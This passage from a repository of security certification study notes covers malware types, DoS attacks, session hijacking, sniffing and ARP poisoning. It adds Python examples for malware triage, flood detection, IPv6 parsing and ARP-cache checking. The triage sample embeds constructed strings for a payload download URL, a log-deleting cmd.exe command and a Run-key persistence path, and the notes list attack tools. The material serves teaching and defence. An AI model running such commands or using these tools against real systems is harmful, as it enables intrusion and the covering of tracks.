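Feed it real output with `netstat -an | python this_script.py`-style piping only after adding a stdin reader; the point of the static sample is to show which columns the parser relies on.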
80 |
81 | ### Viruses and Worms
82 |
83 | - **Virus** - self-replicating program that reproduces by attaching copies of itself into other executable code
84 | - Usually installed by user clicking on malicious file attachments or downloads
85 | - **Fake Antivirus** - tries to convince a user that they have a virus and gets them to download an "antivirus" that is the malware itself
86 | - **Ransomware** - malicious software designed to deny access to a computer until a price is paid; usually spread through email
87 | - **WannaCry** - famous ransomware; within 24 hours had 230,000 victims; spread on its own by exploiting an unpatched SMBv1 vulnerability (EternalBlue, MS17-010)
88 | - **Other Examples**
89 | - Cryptorbit
90 | - CryptoLocker
91 | - CryptoDefense
92 | - police-themed
93 | - **Other Virus Types**
94 | - **Boot Sector Virus** - known as system virus; moves boot sector to another location and then inserts its code in the original location
95 | - **Shell Virus** - wraps around an application's code, inserting itself before the application's own code so it runs first
96 | - **Cluster Virus** - modifies directory table entries so every time a file or folder is opened, the virus runs
97 | - **Multipartite Virus** - attempts to infect both boot sector and files; generally refers to viruses with multiple infection methods
98 | - **Macro Virus** - written in VBA; infects template files - mostly Word and Excel
99 | - **Polymorphic Code Virus** - mutates its code by using a polymorphic engine; difficult to find because code is always changing
100 | - **Encryption Virus** - uses encryption to hide the code from antivirus
101 | - **Metamorphic Virus** - rewrites itself every time it infects a new file
102 | - **Stealth Virus** - known as a tunneling virus; attempts to evade AVs by intercepting their requests and returning them instead of letting them pass to the OS
103 | - **Cavity Virus** - overwrites unused (null) sections of host files so as not to increase the file's size
104 | - **Sparse Infector Virus** - only infects occasionally (e.g. every 10th time)
105 | - **File Extension Virus** - uses double extensions to take advantage of Windows hiding known extensions by default (readme.txt.vbs shows as readme.txt)
106 | - **Virus Makers**
107 | - Sonic Bat
108 | - PoisonVirus Maker
109 | - Sam's Virus Generator
110 | - JPS Virus Maker
111 | - **Worm** - self-replicating malware that sends itself to other computers without human intervention
112 | - Usually doesn't infect files - just resides in active memory
113 | - Often used in botnets
114 | - **Ghost Eye Worm** - hacking tool that uses random messaging on Facebook and other sites to perform a host of malicious efforts
115 |
116 | ### Analyzing Malware
117 |
118 | - **Steps**
119 | 1. Make sure you have a good test bed
120 | - Use a VM with NIC in host-only mode and no open shares
121 | 2. Analyze the malware on the isolated VM in a static state
122 | Tools - BinText (extracts strings) and UPX (unpacks packed binaries) help with looking at the binary
123 | 3. Run the malware and check out processes
124 | - Use Process Monitor, etc. to look at processes
125 | - Use NetResident, TCPview or even Wireshark to look at network activity
126 | 4. Check and see what files were added, changed, or deleted
127 | - Tools - IDA Pro, VirusTotal, Anubis, Threat Analyzer
128 | - **Preventing Malware**
129 | - Make sure you know what is going on in your system
130 | - Have a good antivirus that is up to date
131 | - **Sheepdip** - dedicated system used to scan removable media and files before they are introduced into a network
132 | Is air-gapped from production, runs up-to-date AV, and is wiped if it gets infected
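An added example (not from the study guide) of the static step in the analysis procedure above: hash the file for lookups, check for the UPX marker that says the real strings are hidden until unpacking, and pull out the strings BinText would show, sorting them into URLs, persistence keys and shell commands. The byte string is a constructed stand-in with a PE magic and a few planted strings, not a real sample.

```python
import hashlib
import re
from typing import Dict, List

# Constructed stand-in for a suspicious binary: PE magic, UPX section names and
# a few strings of the kind analysts chase. Not a real sample.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00" + b"\x00" * 8 + b"UPX!" + b"\x00" * 4
    + b"http://203.0.113.7/update.bin\x00"
    + b"cmd.exe /c del %TEMP%\\*.log\x00"
    + b"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    + b"\x01\x02\x03"
)

_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")   # runs of 4+ printable ASCII bytes
_URL = re.compile(r"https?://[^\s\"'<>]+")
_RUN_KEY = re.compile(r"CurrentVersion\\Run", re.IGNORECASE)


def file_hashes(data: bytes) -> Dict[str, str]:
    """Hashes to pin the sample and to look up on VirusTotal and similar services."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def extract_strings(data: bytes) -> List[str]:
    return [m.decode("ascii") for m in _PRINTABLE.findall(data)]


def looks_upx_packed(data: bytes) -> bool:
    """UPX leaves its section names and a 'UPX!' marker in the packed file; a
    hit means the interesting strings only appear after `upx -d`."""
    return b"UPX!" in data or b"UPX0" in data


def triage(data: bytes) -> Dict[str, object]:
    """Static first pass (step 2 of the procedure): no execution, just hashes,
    a packer check and the strings worth chasing in the dynamic steps."""
    strings = extract_strings(data)
    return {
        "is_pe": data[:2] == b"MZ",
        "hashes": file_hashes(data),
        "upx_packed": looks_upx_packed(data),
        "urls": [u for s in strings for u in _URL.findall(s)],
        "persistence_keys": [s for s in strings if _RUN_KEY.search(s)],
        "shell_commands": [s for s in strings
                           if "cmd.exe" in s.lower() or "powershell" in s.lower()],
        "string_count": len(strings),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BINARY).items():
        print(f"{key:17} {value}")
```

The URL and the Run key are exactly what to watch for in steps 3 and 4: the download host in the network capture and the registry key in the file/registry diff.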
133 |
134 | ### Denial of Service Attacks
135 |
136 | - Seeks to take down a system or deny access to it by authorized users
137 | - **Botnet** - network of zombie computers a hacker uses to start a distributed attack
138 | - Can be controlled over HTTP, HTTPS, IRC, or ICQ
139 | - **Basic Categories**
140 | - **Fragmentation attacks** - attacks take advantage of the system's ability to reconstruct fragmented packets
141 | - **Volumetric attacks** - bandwidth attacks; consume all bandwidth for the system or service
142 | - **Application attacks** - consume the resources necessary for the application to run
143 | Note - application-level attacks target weak code in a specific application; "application attacks" is the general term for the category
144 | - **TCP state-exhaustion attacks** - go after load balancers, firewalls and application servers
145 | - **SYN attack** - sends thousands of SYN packets to the machine with a false source address; eventually engages all resources and exhausts the machine
146 | - **SYN flood** - sends thousands of SYN packets; does not spoof IP but doesn't respond to the SYN/ACK packets; eventually bogs down the computer, runs out of resources
147 | - **ICMP flood** - sends ICMP Echo packets with a spoofed address; eventually reaches limit of packets per second sent
148 | - **Smurf** - large number of pings to the broadcast address of the subnet with source IP spoofed as the target; entire subnet responds exhausting the target
149 | - **Fraggle** - same as smurf but with UDP packets
150 | - **Ping of Death** - sends an ICMP echo in fragments that reassemble to more than the 65,535-byte IP maximum; older systems crash during reassembly
151 | - **Teardrop** - overlaps a large number of garbled IP fragments with oversized payloads; causes older systems to crash due to fragment reassembly
152 | - **Peer to peer** - clients of peer-to-peer file-sharing hub are disconnected and directed to connect to the target system
153 | - **Phlashing** - a DoS attack that causes permanent damage to a system; also called bricking a system
154 | - **LAND attack** - sends a SYN packet to the target with the source IP and port spoofed to equal the target's own IP and port; a vulnerable stack replies to itself and loops or crashes
155 | - **Low Orbit Ion Cannon** (LOIC) - DDoS tool that floods a target with TCP, UDP or HTTP requests
156 | - **Other Tools**
157 | - Trinity - Linux based DDoS tool
158 | Tribe Flood Network - classic DDoS tool with a master/daemon structure on compromised hosts; launches massive UDP, ICMP and SYN floods
159 | - R-U-Dead-Yet (RUDY) - DoS with HTTP POST via long-form field submissions
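An added example (not from the study guide) that runs simple detection logic for three of the attacks above over a constructed list of packet summaries: LAND (source equals destination), a Smurf trigger (echo request to the subnet broadcast) and a SYN flood (many sources that send a SYN and never complete the handshake). The addresses, ports and the threshold of 10 half-open sources are assumptions for the example.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

Packet = Dict[str, object]

# Constructed packet summaries, the fields a sniffer would hand you. Not real traffic.
SUBNET_BROADCAST = "10.0.0.255"
SAMPLE_PACKETS: List[Packet] = [
    # LAND: source and destination address/port identical
    {"src": "10.0.0.20", "sport": 80, "dst": "10.0.0.20", "dport": 80, "proto": "TCP", "flags": "S"},
    # Smurf trigger: echo request to broadcast, source spoofed as the victim
    {"src": "10.0.0.20", "sport": 0, "dst": "10.0.0.255", "dport": 0, "proto": "ICMP", "icmp_type": 8},
    # One legitimate handshake: SYN then ACK from the same client
    {"src": "10.0.0.7", "sport": 50000, "dst": "10.0.0.20", "dport": 443, "proto": "TCP", "flags": "S"},
    {"src": "10.0.0.7", "sport": 50000, "dst": "10.0.0.20", "dport": 443, "proto": "TCP", "flags": "A"},
]
# SYN flood: 20 spoofed sources that each send a SYN and never answer the SYN/ACK
SAMPLE_PACKETS += [
    {"src": f"198.51.100.{i}", "sport": 40000 + i, "dst": "10.0.0.20", "dport": 443,
     "proto": "TCP", "flags": "S"}
    for i in range(1, 21)
]


def is_land(pkt: Packet) -> bool:
    return (pkt["proto"] == "TCP" and "S" in str(pkt["flags"])
            and pkt["src"] == pkt["dst"] and pkt["sport"] == pkt["dport"])


def is_smurf_trigger(pkt: Packet, broadcast: str) -> bool:
    """Echo request aimed at the subnet broadcast: every host that answers
    replies to the spoofed source, which is the real victim."""
    return pkt["proto"] == "ICMP" and pkt.get("icmp_type") == 8 and pkt["dst"] == broadcast


def half_open_by_target(pkts: List[Packet]) -> Dict[Tuple[str, int], int]:
    """Per (dst, dport): number of sources that sent a SYN but never an ACK."""
    syn: Dict[Tuple[str, int], Set[str]] = defaultdict(set)
    ack: Dict[Tuple[str, int], Set[str]] = defaultdict(set)
    for p in pkts:
        if p["proto"] != "TCP":
            continue
        key = (str(p["dst"]), int(p["dport"]))
        flags = str(p["flags"])
        if flags == "S":
            syn[key].add(str(p["src"]))
        elif "A" in flags:
            ack[key].add(str(p["src"]))
    return {key: len(sources - ack[key]) for key, sources in syn.items()}


def classify(pkts: List[Packet], broadcast: str, syn_threshold: int = 10) -> Dict[str, object]:
    return {
        "land": [p for p in pkts if is_land(p)],
        "smurf_triggers": [p for p in pkts if is_smurf_trigger(p, broadcast)],
        "syn_flood_targets": sorted(t for t, n in half_open_by_target(pkts).items()
                                    if n >= syn_threshold),
    }


if __name__ == "__main__":
    for name, hits in classify(SAMPLE_PACKETS, SUBNET_BROADCAST).items():
        print(f"{name:18} {hits if name == 'syn_flood_targets' else len(hits)}")
```

Counting distinct sources without an ACK rather than raw SYN volume is what separates a flood from a busy but healthy server; on a real capture the window would also need to be time-bounded.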
160 |
161 | ### Session Hijacking
162 |
163 | - Attacker waits for a session to begin and after the victim authenticates, steals the session for himself
164 | - **Steps**
165 | 1. Sniff the traffic between the client and server
166 | 2. Monitor the traffic and predict the sequence numbering
167 | 3. Desynchronize the session with the client
168 | 4. Predict the session token and take over the session
169 | 5. Inject packets to the target server
170 | - Can be done via brute force, calculation or stealing
171 | Predicting requires the current acknowledgement number and the receiver's window size
172 | A segment is accepted if its sequence number falls inside the receive window, which starts at the last **acknowledgement** number
173 | For example, an acknowledgement of 105 with a window of 200 means sequence numbers from 105 to 305 would be accepted, so an injected packet has to land in that range
174 | - **Tools**
175 | - **Ettercap** - man-in-the-middle tool and packet sniffer on steroids
176 | - **Hunt** - sniff, hijack and reset connections
177 | - **T-Sight** - easily hijack sessions and monitor network connections
178 | - **Zaproxy**
179 | - **Paros**
180 | - **Burp Suite**
181 | - **Juggernaut**
182 | - **Hamster**
183 | - **Ferret**
184 | - **Countermeasures**
185 | - Using unpredictable session IDs
186 | - Limiting incoming connections
187 | - Minimizing remote access
188 | - Regenerating the session key after authentication
189 | - Use IPSec to encrypt
190 | - **IPSec**
191 | - **Transport Mode** - only the payload (and ESP trailer) is encrypted; the original IP header stays in the clear, so the packet is routed normally
192 | - **Tunnel mode** - the entire original packet, header included, is encrypted and wrapped in a new IP header; typical between gateways. AH breaks behind NAT because it authenticates the IP header, while ESP can cross NAT with NAT Traversal (UDP 4500)
193 | - **Architecture Protocols**
194 | - **Authentication Header** - guarantees the integrity and authentication of IP packet sender
195 | - **Encapsulating Security Payload** (ESP) - provides origin authenticity and integrity as well as confidentiality
196 | - **Internet Key Exchange** (IKE) - produces the keys for the encryption process
197 | - **Oakley** - uses Diffie-Hellman to create master and session keys
198 | - **Internet Security Association and Key Management Protocol** (ISAKMP) - framework for negotiating security associations and exchanging keys between two endpoints; IKE is the implementation
199 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/4 - Sniffing and Evasion.md:
--------------------------------------------------------------------------------
1 | # Sniffing and Evasion
2 |
3 | ### Basic Knowledge
4 |
5 | - Sniffing is capturing packets as they pass on the wire to review for interesting information
6 | - **MAC** (Media Access Control) - physical or burned-in address - assigned to NIC for communications at the Data Link layer
7 | - 48 bits long
8 | - Displayed as 12 hex characters separated by colons
9 | - First half of address is the **organizationally unique identifier** - identifies manufacturer
10 | - Second half ensures no two cards on a subnet will have the same address
11 | - NICs normally only process signals meant for it
12 | - **Promiscuous mode** - NIC must be in this setting to look at all frames passing on the wire
13 | - **CSMA/CD** - Carrier Sense Multiple Access/Collision Detection - used over Ethernet to decide who can talk
14 | - **Collision Domains**
15 | - Traffic from your NIC (regardless of mode) can only be seen within the same collision domain
16 | - Hubs by default have one collision domain
17 | - Switches have a collision domain for each port
18 |
19 | ### Protocols Susceptible
20 |
21 | - SMTP is sent in plain text and is viewable over the wire. SMTP v3 limits the information you can get, but you can still see it.
22 | - FTP sends user ID and password in clear text
23 | - TFTP passes everything in clear text
24 | - IMAP, POP3, NNTP and HTTP all send over clear text data
25 | - TCP shows sequence numbers (usable in session hijacking)
26 | - TCP and UDP show open ports
27 | - IP shows source and destination addresses
28 |
29 | ### ARP
30 |
31 | - Stands for Address Resolution Protocol
32 | - Resolves IP address to a MAC address
33 | - Packets are ARP_REQUEST and ARP_REPLY
34 | - Each computer maintains its own ARP cache, which can be poisoned
35 | - **Commands**
36 | - arp -a - displays current ARP cache
37 | - arp -d * - clears ARP cache
38 | - Works on a broadcast basis - both requests and replies are broadcast to everyone
39 | - **Gratuitous ARP** - special packet to update ARP cache even without a request
40 | - This is used to poison cache on other machines
41 |
42 | ### IPv6
43 |
44 | - Uses 128-bit address
45 | - Has eight groups of four hexadecimal digits
46 | - A run of consecutive all-zero groups can be shortened to nothing (just the start and end colons)
47 | - Double colon can only be used once
48 | - Loopback address is ::1
49 |
50 | | IPv6 Address Type | Description |
51 | | ----------------- | ----------------------------------------------------- |
52 | | Unicast | Addressed and intended for one host interface |
53 | | Multicast | Addressed for multiple host interfaces |
54 | | Anycast | Large number of hosts can receive; nearest host opens |
55 |
56 | | IPv6 Scopes | Description |
57 | | ----------- | ------------------------------------------------------------ |
58 | | Link local | Applies only to hosts on the same subnet (Address block fe80::/10) |
59 | | Site local | Applies to hosts within the same organization (Address block FEC0::/10) |
60 | | Global | Includes everything |
61 |
62 | - Scope applies for multicast and anycast
63 | - Traditional network scanning is **computationally less feasible**
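
An added example (not part of the study guide) that applies the rules above: it expands a compressed address back to eight 4-digit groups, rejects a second `::`, produces the canonical short form, and classifies scope by the prefixes listed (`::1`, `fe80::/10`, `FEC0::/10`, multicast `ff00::/8`, otherwise global). Sample addresses are constructed; a zone id after `%` is stripped.

```python
import re

# Constructed sample addresses (not from the study guide) covering the rules above.
SAMPLES = {
    "::1": "loopback",
    "fe80::1%eth0": "link-local",
    "FEC0::1234": "site-local",
    "2001:db8::8a2e:370:7334": "global",
    "ff02::1": "multicast",
}

def expand_ipv6(addr):
    """Expand an IPv6 address to eight 4-digit hex groups.

    Rules from the guide: a run of all-zero groups may be collapsed to '::',
    and '::' may appear at most once. A zone id (after '%') is stripped.
    """
    addr = addr.split("%", 1)[0].lower()
    if addr.count("::") > 1:
        raise ValueError("'::' may appear only once: %s" % addr)
    if "::" in addr:
        left, right = addr.split("::")
        lgroups = left.split(":") if left else []
        rgroups = right.split(":") if right else []
        missing = 8 - len(lgroups) - len(rgroups)
        if missing < 1:
            raise ValueError("'::' must replace at least one group: %s" % addr)
        groups = lgroups + ["0"] * missing + rgroups
    else:
        groups = addr.split(":")
    if len(groups) != 8 or not all(re.fullmatch(r"[0-9a-f]{1,4}", g) for g in groups):
        raise ValueError("not a valid IPv6 address: %s" % addr)
    return ":".join(g.zfill(4) for g in groups)

def compress_ipv6(addr):
    """Canonical short form: strip leading zeros and collapse the longest run
    (length >= 2) of zero groups into '::'; the leftmost run wins on ties."""
    groups = [g.lstrip("0") or "0" for g in expand_ipv6(addr).split(":")]
    best_start, best_len = -1, 0
    i = 0
    while i < 8:
        if groups[i] == "0":
            j = i
            while j < 8 and groups[j] == "0":
                j += 1
            if j - i > best_len:
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1
    if best_len < 2:
        return ":".join(groups)
    head = ":".join(groups[:best_start])
    tail = ":".join(groups[best_start + best_len:])
    return head + "::" + tail

def ipv6_scope(addr):
    """Classify by the prefixes the guide lists: ::1 loopback, fe80::/10
    link-local, fec0::/10 site-local, ff00::/8 multicast, else global."""
    full = expand_ipv6(addr)
    if full == "0000:0000:0000:0000:0000:0000:0000:0001":
        return "loopback"
    first = int(full[:4], 16)
    if first >> 8 == 0xFF:
        return "multicast"
    if first & 0xFFC0 == 0xFE80:   # /10 prefix: top ten bits 1111 1110 10
        return "link-local"
    if first & 0xFFC0 == 0xFEC0:   # /10 prefix: top ten bits 1111 1110 11
        return "site-local"
    return "global"

if __name__ == "__main__":
    for a, expected in SAMPLES.items():
        print(f"{a:26} {expand_ipv6(a)}  {compress_ipv6(a):24} {ipv6_scope(a)} (expected {expected})")
```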
64 |
65 | ### Wiretapping
66 |
67 | - **Lawful interception** - legally intercepting communications between two parties
68 | - **Active** - interjecting something into the communication
69 | - **Passive** - only monitors and records the data
70 | - **PRISM** - system used by NSA to wiretap external data coming into US
71 |
72 | ### Active and Passive Sniffing
73 |
74 | - **Passive sniffing** - watching network traffic without interaction; only works for same collision domain
75 | - **Active sniffing** - uses methods to make a switch send traffic to you even though it isn't destined for your machine
76 | - **Span port** - switch configuration that makes the switch send a copy of all frames from other ports to a specific port
77 | - Not all switches have the ability to do this
78 | - Modern switches sometimes don't allow span ports to send data - you can only listen
79 | - **Network tap** - special port on a switch that allows the connected device to see all traffic
80 | - **Port mirroring** - another word for span port
81 |
82 | ### MAC Flooding
83 |
84 | - Switches either flood or forward data
85 | - If a switch doesn't know what MAC address is on a port, it will flood the data until it finds out
86 | - **CAM Table** - the table on a switch that stores which MAC address is on which port
87 | - If table is empty or full, everything is sent to all ports
88 | - This works by sending so many MAC addresses to the CAM table that it can't keep up
89 | - **Tools**
90 | - Etherflood
91 | - Macof
92 | - **Switch port stealing** - tries to update information regarding a specific port in a race condition
93 | - MAC Flooding will often destroy the switch before you get anything useful, doesn't last long and it will get you noticed. Also, most modern switches protect against this.
94 |
95 | ### ARP Poisoning
96 |
97 | - Also called ARP spoofing or gratuitous ARP
98 | - This can trigger alerts because of the constant need to keep updating the ARP cache of machines
99 | - Changes the cache of machines so that packets are sent to you instead of the intended target
100 | - **Countermeasures**
101 | - Dynamic ARP Inspection using DHCP snooping
102 | - XArp can also watch for this
103 | - Default gateway MAC can also be added permanently into each machine's cache
104 | - **Tools**
105 | - Cain and Abel
106 | - WinArpAttacker
107 | - Ufasoft
108 | - dsniff
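
An added example (not from the study guide) of the watching that tools like XArp do: it parses two `arp -a` snapshots, compares them against a pinned gateway entry, and flags an IP whose MAC changed and a single MAC that now claims several IPs, which is what a poisoned cache looks like. The snapshot text is constructed in Linux `arp -a` format.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output (Linux format); not captured from a real host.
BEFORE = """\
? (192.168.1.1) at 00:50:56:aa:00:01 [ether] on eth0
? (192.168.1.20) at 00:50:56:aa:00:20 [ether] on eth0
? (192.168.1.21) at 00:50:56:aa:00:21 [ether] on eth0
"""
AFTER = """\
? (192.168.1.1) at 00:50:56:aa:00:99 [ether] on eth0
? (192.168.1.20) at 00:50:56:aa:00:99 [ether] on eth0
? (192.168.1.21) at 00:50:56:aa:00:21 [ether] on eth0
? (192.168.1.99) at 00:50:56:aa:00:99 [ether] on eth0
"""
# Known-good mapping for the default gateway, the "permanent" entry the guide recommends.
PINNED = {"192.168.1.1": "00:50:56:aa:00:01"}

ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17})", re.I)

def parse_arp_cache(text):
    """Return {ip: mac} from `arp -a` output; incomplete entries (no MAC) are skipped."""
    cache = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            cache[m["ip"]] = m["mac"].lower()
    return cache

def check_arp_cache(before, after, pinned):
    """Compare two cache snapshots and return a list of findings.

    Finding kinds:
      pinned-mismatch          - an entry disagrees with the known-good mapping
      mac-changed              - an IP's MAC differs from the previous snapshot
      mac-claims-multiple-ips  - one MAC is mapped to several IPs (gateway + victims)
    """
    findings = []
    for ip, mac in after.items():
        if ip in pinned and pinned[ip] != mac:
            findings.append(("pinned-mismatch", ip, pinned[ip], mac))
        if ip in before and before[ip] != mac:
            findings.append(("mac-changed", ip, before[ip], mac))
    by_mac = defaultdict(set)
    for ip, mac in after.items():
        by_mac[mac].add(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac-claims-multiple-ips", mac, tuple(sorted(ips))))
    return findings

if __name__ == "__main__":
    for finding in check_arp_cache(parse_arp_cache(BEFORE), parse_arp_cache(AFTER), PINNED):
        print(*finding)
```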
109 |
110 | ### DHCP Starvation
111 |
112 | - Attempt to exhaust all available addresses from the server
113 | - Attacker sends so many requests that the address space allocated is exhausted
114 | - DHCPv4 packets - DHCPDISCOVER, DHCPOFFER, DHCPREQUEST, DHCPACK
115 | - DHCPv6 packets - Solicit, Advertise, Request (Confirm/Renew), Reply
116 | - **DHCP Steps**
117 | 1. Client sends DHCPDISCOVER
118 | 2. Server responds with DHCPOFFER
119 | 3. Client sends request for IP with DHCPREQUEST
120 | 4. Server sends address and config via DHCPACK
121 | - **Tools**
122 | - Yersinia
123 | - DHCPstarv
124 | - Mitigation is to configure DHCP snooping
